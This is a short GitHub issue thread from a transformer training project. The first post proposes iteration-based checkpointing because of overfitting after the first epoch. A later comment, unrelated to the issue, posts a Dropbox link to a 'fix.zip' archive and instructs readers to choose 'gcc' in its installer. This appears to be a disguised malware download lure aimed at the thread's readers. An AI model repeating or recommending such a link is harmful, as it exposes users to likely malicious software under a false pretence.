### ISSUE TITLE
Iteration based training instead of epoch based training

### ISSUE THREAD

**Issue by xiaoxi-private** [xiaoxi-s/transformer-with-shakespeare#19]
We can use iteration based training to save models in a more granular way. Since after the first epoch, the model clearly overfits the data with the loss:
```
Epoch 1/10: train loss 0.023793934649032462, test loss 0.021087841193815227
```

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
